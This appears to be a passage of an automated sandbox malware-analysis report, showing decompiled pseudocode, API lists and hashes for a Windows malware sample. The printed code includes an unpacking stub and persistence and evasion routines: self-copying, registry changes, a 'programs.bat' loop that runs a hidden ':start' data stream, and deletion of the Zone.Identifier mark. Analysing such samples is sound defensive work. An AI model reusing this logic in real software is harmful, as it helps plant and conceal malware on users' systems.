						_t70 = _v8;
						if(_t70 != 0) {
							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
							_v8 = _t87;
						}
						_t71 = _v12;
						if(_t71 != 0) {
							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
							_v12 = _t87;
						}
						__imp__CoUninitialize();
						return _t48;
					}
				}
				return _t43;
			}






























                                                                    0x02d22918
                                                                    0x02d2291a
                                                                    0x02d2291e
                                                                    0x02d22924
                                                                    0x02d22927
                                                                    0x02d22938
                                                                    0x02d2293b
                                                                    0x02d2293e
                                                                    0x02d22944
                                                                    0x02d22949
                                                                    0x02d2295c
                                                                    0x02d2295f
                                                                    0x02d22964
                                                                    0x02d2296d
                                                                    0x02d22970
                                                                    0x02d22a22
                                                                    0x02d22a22
                                                                    0x02d22a2c
                                                                    0x02d22a35
                                                                    0x02d22a3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d22984
                                                                    0x02d2298b
                                                                    0x02d22990
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d2299a
                                                                    0x02d229a0
                                                                    0x02d229a6
                                                                    0x02d229a7
                                                                    0x02d229a8
                                                                    0x02d229af
                                                                    0x02d229b5
                                                                    0x02d229ce
                                                                    0x02d229d0
                                                                    0x02d229d8
                                                                    0x02d229e5
                                                                    0x02d229da
                                                                    0x02d229e1
                                                                    0x02d229e1
                                                                    0x02d229e7
                                                                    0x02d229ea
                                                                    0x02d229f0
                                                                    0x02d22a10
                                                                    0x02d22a14
                                                                    0x02d22a1a
                                                                    0x02d22a1f
                                                                    0x02d22a20
                                                                    0x00000000
                                                                    0x02d229f2
                                                                    0x02d229f2
                                                                    0x02d229f4
                                                                    0x02d229f7
                                                                    0x02d229fd
                                                                    0x02d229ff
                                                                    0x02d22a02
                                                                    0x02d22a05
                                                                    0x02d22a06
                                                                    0x02d22a09
                                                                    0x02d22a0b
                                                                    0x00000000
                                                                    0x02d229f4
                                                                    0x02d229f0
                                                                    0x02d229b7
                                                                    0x02d229c7
                                                                    0x02d229cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d229cc
                                                                    0x02d22a40
                                                                    0x02d22a45
                                                                    0x02d22a4a
                                                                    0x02d22a4d
                                                                    0x02d22a4d
                                                                    0x02d22a50
                                                                    0x02d22a55
                                                                    0x02d22a5a
                                                                    0x02d22a5d
                                                                    0x02d22a5d
                                                                    0x02d22a60
                                                                    0x00000000
                                                                    0x02d22a60
                                                                    0x02d22964
                                                                    0x02d22a6a

                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 02D2291E
                                                                    • CoCreateInstance.OLE32(02D245E0,00000000,00000001,02D273F0,?,?,?,?,02D22F37,?,?,?,02D2227B), ref: 02D2293E
                                                                    • VariantInit.OLEAUT32(?), ref: 02D2299A
                                                                    • CoUninitialize.OLE32(?,?,?,02D22F37,?,?,?,02D2227B), ref: 02D22A60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInitInitializeInstanceUninitializeVariant
                                                                    • String ID: Description$FriendlyName
                                                                    • API String ID: 4142528535-3192352273
                                                                    • Opcode ID: 9f2eaaeb9e15ae78bd67182794a815b7c7aaa9c3c26c1ffc90fe27b210ad4ad0
                                                                    • Instruction ID: 53b1320526aa52d3e48a97df93b280309f9e8c42839a3b6a2266b18f39ce53d3
                                                                    • Opcode Fuzzy Hash: 9f2eaaeb9e15ae78bd67182794a815b7c7aaa9c3c26c1ffc90fe27b210ad4ad0
                                                                    • Instruction Fuzzy Hash: B4415F74A40215AFDB24DFA5D888DAEBBB9EF98708B14445DF842EB350DB70DE05CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00553B50 Relevance: 7.7, APIs: 5, Instructions: 211librarymemoryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 342 553b50-553b67 343 553b7a-553b7f 342->343 344 553b81 343->344 345 553b70-553b75 344->345 346 553b83 344->346 348 553b76-553b78 345->348 347 553b88-553b8a 346->347 349 553b93-553b97 347->349 350 553b8c-553b91 347->350 348->343 348->344 351 553ba4-553ba7 349->351 352 553b99 349->352 350->349 355 553bb0-553bb2 351->355 356 553ba9-553bae 351->356 353 553bc3-553bc8 352->353 354 553b9b-553ba2 352->354 357 553bdb-553bdd 353->357 358 553bca-553bd3 353->358 354->351 354->353 355->347 356->355 361 553be6 357->361 362 553bdf-553be4 357->362 359 553bd5-553bd9 358->359 360 553c4a-553c4d 358->360 359->361 363 553c52-553c55 360->363 364 553bb4-553bb6 361->364 365 553be8-553beb 361->365 362->361 366 553c57-553c59 363->366 369 553bbf-553bc1 364->369 370 553bb8-553bbd 364->370 367 553bf4 365->367 368 553bed-553bf2 365->368 366->363 371 553c5b-553c5e 366->371 367->364 372 553bf6-553bf8 367->372 368->367 373 553c15-553c24 369->373 370->369 371->363 374 553c60-553c7c 371->374 375 553c01-553c05 372->375 376 553bfa-553bff 372->376 377 553c34-553c41 373->377 378 553c26-553c2d 373->378 374->366 380 553c7e 374->380 375->372 381 553c07 375->381 376->375 377->377 379 553c43-553c45 377->379 378->378 382 553c2f 378->382 379->348 383 553c84-553c88 380->383 384 553c12 381->384 385 553c09-553c10 381->385 382->348 386 553ccf-553cd2 383->386 387 553c8a-553ca0 LoadLibraryA 383->387 384->373 385->372 385->384 388 553cd5-553cdc 386->388 389 553ca1-553ca6 387->389 390 553cde-553ce0 388->390 391 553d09-553d39 VirtualProtect * 2 388->391 389->383 392 553ca8-553caa 389->392 393 553cf3-553d00 390->393 394 553ce2-553cf1 390->394 395 553d3d-553d41 391->395 396 553cb3-553cc0 GetProcAddress 392->396 397 553cac-553cb2 392->397 393->394 398 553d02-553d07 393->398 394->388 395->395 399 553d43 395->399 400 553cc2-553cc7 396->400 401 553cc9 ExitProcess 396->401 397->396 398->394 400->389
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?), ref: 00553C9A
                                                                    • GetProcAddress.KERNEL32(?,00550FF9), ref: 00553CB8
                                                                    • ExitProcess.KERNEL32(?,00550FF9), ref: 00553CC9
                                                                    • VirtualProtect.KERNEL32(00400000,00001000,00000004,?,00000000), ref: 00553D20
                                                                    • VirtualProtect.KERNEL32(00400000,00001000), ref: 00553D35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                    • String ID:
                                                                    • API String ID: 1996367037-0
                                                                    • Opcode ID: 18a66460aa6468ff1edf68559dab2d8afdd706d358a0308808a19eab16187e1a
                                                                    • Instruction ID: 64443ad41b183cbc27e7b15718d6566a5c590f0b0c505bdb3da6e7c3dd8ff032
                                                                    • Opcode Fuzzy Hash: 18a66460aa6468ff1edf68559dab2d8afdd706d358a0308808a19eab16187e1a
                                                                    • Instruction Fuzzy Hash: 58610B71A442525BD7208A78CCE0660BFA0FF513B27280B7ACDEAD73C5E7A45E0D8760
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407F52 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00007F5E,00407C29), ref: 00407F57
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: c1d0115d781149f98acdd113d359e2029f14d1e83f0f557cfb56ddd92ebe6065
                                                                    • Instruction ID: 9a0e7f2bd3064cf6d77b813ca09d3913d3753a8899137a024509c302e72e5e7e
                                                                    • Opcode Fuzzy Hash: c1d0115d781149f98acdd113d359e2029f14d1e83f0f557cfb56ddd92ebe6065
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D23457 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 188registrystringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 95%
                                                                    			E02D23457(void* __eflags) {
				char _v592;
				char _v608;
				char _v1120;
				short _v1140;
				char _v1372;
				intOrPtr _v1484;
				char _v1488;
				char _v1500;
				char _v1504;
				char _v1520;
				intOrPtr _v1532;
				intOrPtr _v1536;
				intOrPtr _v1544;
				intOrPtr _v1552;
				intOrPtr _v1568;
				intOrPtr _v1576;
				char _v1580;
				char _v1584;
				intOrPtr _v1588;
				int _v1592;
				char _v1600;
				char _v1604;
				char _v1608;
				void* _v1612;
				char _v1616;
				char _v1620;
				char _v1632;
				void* __ebx;
				void* __edi;
				void* _t56;
				void* _t98;
				void* _t100;
				void* _t101;
				CHAR* _t114;
				char* _t121;
				CHAR* _t127;
				void* _t131;
				intOrPtr _t143;

				_v1600 = 0xa;
				_v1592 = 0;
				E02D15BF1( &_v1580);
				E02D21638( &_v1500);
				E02D110AD(GetTickCount());
				_v1632 = 0x104;
				GetModuleFileNameA(0,  &_v1372, _t127);
				_v1608 = 0;
				_t56 = E02D21E21( &_v1372,  &_v1608); // executed
				_t126 = _v1608;
				if(_v1608 == 0) {
					L20:
					E02D210D7( &_v1500);
					E02D15C16( &_v1580, _t127);
					return 0;
				} else {
					_v1604 = 0;
					E02D21BF8(_t56, _t126, 0x215a,  &_v1604);
					_t131 = 0x20;
					_t127 = E02D11085(_t131);
					_t114 = _t127;
					do {
						 *_t114 = 0;
						_t114 =  &(_t114[1]);
						_t131 = _t131 - 1;
					} while (_t131 != 0);
					E02D1102C(_t127,  &_v1604, 4);
					 *0x2d298b8 = CreateEventA(0, 0, 0, _t127);
					if(GetLastError() == 0xb7) {
						goto L20;
					}
					_t143 =  *0x2d298b8; // 0x34c
					if(_t143 == 0) {
						goto L20;
					}
					RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1612,  &_v1592); // executed
					RegSetValueExA(_v1612, "MaxConnectionsPer1_0Server", 0, 4,  &_v1600, 4); // executed
					RegSetValueExA(_v1612, "MaxConnectionsPerServer", 0, 4,  &_v1600, 4); // executed
					RegCloseKey(_v1612);
					E02D15A10( &_v1580, _t126, _t143); // executed
					E02D214A6( &_v1500, _t126, _t143,  &_v1580); // executed
					_t117 =  &_v592;
					E02D14EE7( &_v592, _t126, _t143,  &_v1584,  &_v1504); // executed
					E02D11052( &_v1120, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1120); // executed
					lstrcatW( &_v1140, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v1140, 0); // executed
					if(_v1552 != 0) {
						_t100 = E02D1FBFC(); // executed
						if(_t100 != 1) {
							_t101 = E02D1F51D();
							_t146 = _t101 - 0xa;
							if(_t101 != 0xa) {
								E02D21A3C(0,  &_v592, __eflags);
							} else {
								E02D21AB9(_t126, _t146);
							}
						}
					}
					if(_v1536 != 0) {
						_t98 = E02D1FBFC(); // executed
						_t148 = _t98 - 1;
						if(_t98 == 1) {
							E02D22FD7(_t117, _t148);
						}
					}
					_t149 = _v1484;
					if(_v1484 != 0) {
						L16:
						__eflags = _v1544;
						if(__eflags != 0) {
							E02D21F13();
						}
						E02D14E5B( &_v608, _t126, __eflags);
						goto L19;
					} else {
						E02D21136( &_v1520, _t149, _v1576, _v1568, _v1532); // executed
						_t150 = _v1588;
						if(_v1588 == 0) {
							goto L16;
						}
						_v1608 = 0;
						_t121 =  &_v1616;
						E02D1362D(_t121,  &_v1488); // executed
						_push(_t121);
						E02D20BD9( &_v1608, _t150,  &_v1620,  &_v1612); // executed
						E02D15EA5(_v1632);
						E02D15EA5(0);
						L19:
						E02D14BC0( &_v608, _t127, _t150);
						goto L20;
					}
				}
			}









































                                                                    0x02d23467
                                                                    0x02d23474
                                                                    0x02d23478
                                                                    0x02d23484
                                                                    0x02d23490
                                                                    0x02d23495
                                                                    0x02d234a5
                                                                    0x02d234af
                                                                    0x02d234ba
                                                                    0x02d234bf
                                                                    0x02d234c5
                                                                    0x02d236cf
                                                                    0x02d236d6
                                                                    0x02d236df
                                                                    0x02d236ec
                                                                    0x02d234cb
                                                                    0x02d234cf
                                                                    0x02d234db
                                                                    0x02d234e2
                                                                    0x02d234e9
                                                                    0x02d234ee
                                                                    0x02d234f0
                                                                    0x02d234f0
                                                                    0x02d234f2
                                                                    0x02d234f3
                                                                    0x02d234f3
                                                                    0x02d23500
                                                                    0x02d23512
                                                                    0x02d23522
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d23528
                                                                    0x02d2352e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d23551
                                                                    0x02d23570
                                                                    0x02d23585
                                                                    0x02d2358b
                                                                    0x02d23595
                                                                    0x02d235a6
                                                                    0x02d235b8
                                                                    0x02d235bf
                                                                    0x02d235d2
                                                                    0x02d235e7
                                                                    0x02d235fa
                                                                    0x02d23609
                                                                    0x02d23613
                                                                    0x02d23615
                                                                    0x02d2361d
                                                                    0x02d2361f
                                                                    0x02d23624
                                                                    0x02d23627
                                                                    0x02d23630
                                                                    0x02d23629
                                                                    0x02d23629
                                                                    0x02d23629
                                                                    0x02d23627
                                                                    0x02d2361d
                                                                    0x02d23639
                                                                    0x02d2363b
                                                                    0x02d23640
                                                                    0x02d23643
                                                                    0x02d23645
                                                                    0x02d23645
                                                                    0x02d23643
                                                                    0x02d2364a
                                                                    0x02d23651
                                                                    0x02d236ac
                                                                    0x02d236ac
                                                                    0x02d236b0
                                                                    0x02d236b2
                                                                    0x02d236b2
                                                                    0x02d236be
                                                                    0x00000000
                                                                    0x02d23653
                                                                    0x02d23666
                                                                    0x02d2366b
                                                                    0x02d2366f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d23678
                                                                    0x02d2367d
                                                                    0x02d23681
                                                                    0x02d23686
                                                                    0x02d23695
                                                                    0x02d2369e
                                                                    0x02d236a5
                                                                    0x02d236c3
                                                                    0x02d236ca
                                                                    0x00000000
                                                                    0x02d236ca
                                                                    0x02d23651

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 02D23489
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 02D234A5
                                                                      • Part of subcall function 02D21E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E4E
                                                                      • Part of subcall function 02D21E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E61
                                                                      • Part of subcall function 02D21E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E72
                                                                      • Part of subcall function 02D21E21: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E7F
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D2350C
                                                                    • GetLastError.KERNEL32 ref: 02D23517
                                                                    • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 02D23551
                                                                    • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 02D23570
                                                                    • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 02D23585
                                                                    • RegCloseKey.ADVAPI32(?), ref: 02D2358B
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 02D235E7
                                                                    • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 02D235FA
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 02D23609
                                                                      • Part of subcall function 02D21A3C: GetModuleFileNameW.KERNEL32(00000000,02E5CBF0,00000208,00000000,00000000,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A58
                                                                      • Part of subcall function 02D21A3C: IsUserAnAdmin.SHELL32 ref: 02D21A5E
                                                                      • Part of subcall function 02D21A3C: FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A87
                                                                      • Part of subcall function 02D21A3C: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?), ref: 02D21A91
                                                                      • Part of subcall function 02D21A3C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?), ref: 02D21A9B
                                                                      • Part of subcall function 02D21A3C: LockResource.KERNEL32(00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 02D21AA2
                                                                      • Part of subcall function 02D21136: CopyFileW.KERNEL32(?,?,00000000,?,02D24684,?,00000000,?,?,?,?,00000000,745D0770,00000000), ref: 02D211D7
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D20BD9: CreateProcessW.KERNEL32 ref: 02D20C14
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    • \Microsoft Vision\, xrefs: 02D235ED
                                                                    • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 02D23547
                                                                    • MaxConnectionsPerServer, xrefs: 02D2357C
                                                                    • MaxConnectionsPer1_0Server, xrefs: 02D23567
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Create$Resource$CloseFindHeapModuleNameProcessValue$AdminAllocateChangeCopyCountDirectoryErrorEventFolderFreeLastLoadLockNotificationPathReadSizeSizeofTickUserVirtuallstrcatlstrcpy
                                                                    • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                                                    • API String ID: 3977721202-2552559493
                                                                    • Opcode ID: 59aa34a6267814967c2ca466bcf2744150c967be7c9fdb581054d617e96aef4c
                                                                    • Instruction ID: d42d083c8179f2fa62f1a2616d1f53e57371715cd185794014e8ad5f04518096
                                                                    • Opcode Fuzzy Hash: 59aa34a6267814967c2ca466bcf2744150c967be7c9fdb581054d617e96aef4c
                                                                    • Instruction Fuzzy Hash: 0F614FB1444394AFD720EB60E884EABB7ADEFA4709F00492DF68592250DB349D4CCF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004073CE Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0054C04C,00000FA0,?,?,004073AC), ref: 004073DA
                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,004073AC), ref: 004073E5
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,004073AC), ref: 004073F6
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00407408
                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00407416
                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,004073AC), ref: 00407439
                                                                    • RtlDeleteCriticalSection.NTDLL(0054C04C), ref: 00407455
                                                                    • CloseHandle.KERNEL32(00000000,?,?,004073AC), ref: 00407465
                                                                    Strings
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 004073E0
                                                                    • WakeAllConditionVariable, xrefs: 0040740E
                                                                    • kernel32.dll, xrefs: 004073F1
                                                                    • SleepConditionVariableCS, xrefs: 00407402
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 2565136772-3242537097
                                                                    • Opcode ID: 47bab8a6c0b3375a39d6aa0030a1c0f25a48bd971caaa7ad25551b5adff7caf2
                                                                    • Instruction ID: a3fc7ea5def126fc8579fda3970e1067efdb3e252d3ae04e5338d1b1bab15f84
                                                                    • Opcode Fuzzy Hash: 47bab8a6c0b3375a39d6aa0030a1c0f25a48bd971caaa7ad25551b5adff7caf2
                                                                    • Instruction Fuzzy Hash: 46012871E85701ABD7611B74AC0DEDB3E58EF81B00714817EFD09E3290DEB8D800966D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21136 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 278fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 96%
                                                                    			E02D21136(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, void* _a12) {
				void* _v12;
				char _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr* _v40;
				char _v44;
				char _v48;
				void* _t90;
				WCHAR* _t102;
				WCHAR* _t108;
				void* _t117;
				void* _t118;
				intOrPtr* _t121;
				intOrPtr* _t123;
				void* _t131;
				intOrPtr* _t135;
				intOrPtr* _t137;
				void* _t138;
				int _t142;
				void* _t151;
				void* _t157;
				int _t160;
				intOrPtr* _t169;
				char* _t173;
				WCHAR* _t180;
				intOrPtr _t217;
				int _t243;
				WCHAR* _t254;
				WCHAR** _t255;
				char** _t256;
				void* _t257;

				_t257 = __eflags;
				_t169 = __ecx;
				_v40 = __ecx;
				E02D1F481(); // executed
				_t239 = 0xa;
				_t173 =  &_v48;
				E02D134A7(_t173, _t239, _t257); // executed
				_push(_t173);
				_push(_t173);
				_t90 = E02D20F6E(__ecx, _t173, __ecx + 0x10); // executed
				E02D20FAE(__ecx);
				_t243 = 0;
				if(_t90 == 0) {
					L4:
					_t250 = _t169 + 0x10;
					goto L5;
				} else {
					_t259 = _a4;
					if(_a4 == 0) {
						goto L4;
					} else {
						_t239 =  *((intOrPtr*)(__ecx + 0xc));
						_t255 = __ecx + 0x20;
						_t151 = E02D1F76B( &_v24,  *((intOrPtr*)(__ecx + 0xc)), _t259); // executed
						E02D13437(_t255, _t151); // executed
						E02D1F71F(E02D15EA5(_v24), _t255);
						E02D1362D( &_v16, _t169 + 0x4c); // executed
						_t157 = E02D1346A(_t255, _t239, _t259, "\\"); // executed
						E02D13335(_t157, _t259,  &_v16); // executed
						_t232 = _v16;
						E02D15EA5(_v16);
						_t160 = CopyFileW(_v20,  *_t255, 0); // executed
						if(_t160 != 0) {
							_t233 = _t255;
							E02D13221(_t255, _t239, _t256);
							E02D15911(_t169 + 0x30, _t239, _t256);
							E02D160AA( &_v36, _t239, _t233, _t233, _t232, _t232);
							_t256 =  &(_t256[4]);
							_t250 = _t169 + 0x10;
							E02D2106C(_t169, 0x80000001, _t169 + 0x10, 0xf003f, 0); // executed
							E02D21039(_t169, _t169 + 0x18,  &_v36, 3); // executed
							E02D13036( &_v36);
							L5:
							if( *_t169 == _t243) {
								E02D2106C(_t169, 0x80000001, _t250, 0xf003f, _t243);
							}
							_t262 = _a12 - _t243;
							if(_a12 == _t243) {
								L11:
								__eflags = _a8;
								if(__eflags == 0) {
									L17:
									E02D135E5( &_a4,  *((intOrPtr*)(_t169 + 0x20)));
									E02D13335( &_a4, __eflags, E02D135E5( &_a12, L":Zone.Identifier"));
									E02D15EA5(_a12);
									DeleteFileW(_a4);
									_t180 = _a4;
									_t243 = 1;
									__eflags = 1;
									goto L18;
								} else {
									__eflags = _a4;
									if(_a4 == 0) {
										E02D13437(_t169 + 0x20,  &_v20);
									}
									_t102 = E02D2106C(_t169 + 4,  *((intOrPtr*)(_t169 + 8)), _t169 + 0x14, 0x20006, _t243);
									__eflags = _t102;
									if(_t102 != 0) {
										E02D1362D( &_a4, _t169 + 0x54);
										_t108 = E02D21039(_t169 + 4,  &_a4, E02D12FDA( &_v44, _t239, _t169 + 0x20), 1);
										E02D15EA5(_a4);
										E02D13036( &_v44);
										__eflags = _t108;
										if(_t108 != 0) {
											E02D20FAE(_t169 + 4);
											goto L17;
										}
									}
								}
							} else {
								__imp__SHGetKnownFolderPath(_t243, _t243,  &_v28); // executed
								E02D135E5( &_v16, _v28); // executed
								E02D1346A( &_v16, _t239, _t262, L"\\programs.bat"); // executed
								E02D135E5( &_v12, L"for /F \"usebackq tokens=*\" %%A in (\""); // executed
								_t117 = E02D1346A( &_v12, _t239, _t262, _v16); // executed
								_t118 = E02D1346A(_t117, _t239, _t262, L":start"); // executed
								E02D1346A(_t118, _t239, _t262, L"\") do %%A"); // executed
								_t121 = E02D13554( &_v12,  &_v32); // executed
								_t123 = E02D13554( &_v16,  &_v24); // executed
								E02D21D35( *_t123,  *_t121, E02D13261( &_v12)); // executed
